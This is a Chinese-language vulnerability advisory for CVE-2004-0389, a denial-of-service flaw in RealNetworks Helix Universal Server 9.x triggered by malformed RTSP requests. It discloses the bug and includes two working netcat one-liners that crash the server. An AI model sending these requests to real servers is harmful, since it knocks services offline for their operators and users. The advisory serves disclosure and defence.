发布日期：2004-04-15
更新日期：2004-04-20

受影响系统：

Real Networks Helix Universal Server 9.01
Real Networks Helix Universal Server 9.0.2.881
Real Networks Helix Universal Server 9.0.2.802
Real Networks Helix Universal Server 9.0.2.794

描述：

---

BUGTRAQ  ID: 10157
CVE(CAN) ID: CVE-2004-0389

Helix Universal Server是一款由RealNetWorks开发和维护的多类型媒体服务器。

Helix Universal Server不正确处理畸形RTSP请求，远程攻击者可以利用这个漏洞对服务器进行拒绝服务攻击。

问题是Helix Universal Server不正确处理特殊构建的GET请求，下面的请求可导致NULL指针废弃而引起应用程序崩溃：

$ echo -e "GET_PARAMETER / RTSP/1.0\n\n" | nc -v localhost 554
$ echo -e "DESCRIBE / RTSP/1.0\nSession:\n\n" | nc -v localhost 554

如果服务器以特殊选项如'--no-crash-avoidance'或'--no-auto-restart'启动，服务器就会变的不可访问。

<*来源：iDEFENSE
  
  链接：http://www.idefense.com/application/poi/display?id=102&type=vulnerabilities
*>

建议：

---

厂商补丁：

Real Networks
-------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.real.com

浏览次数：2872
严重程度：0（网友投票）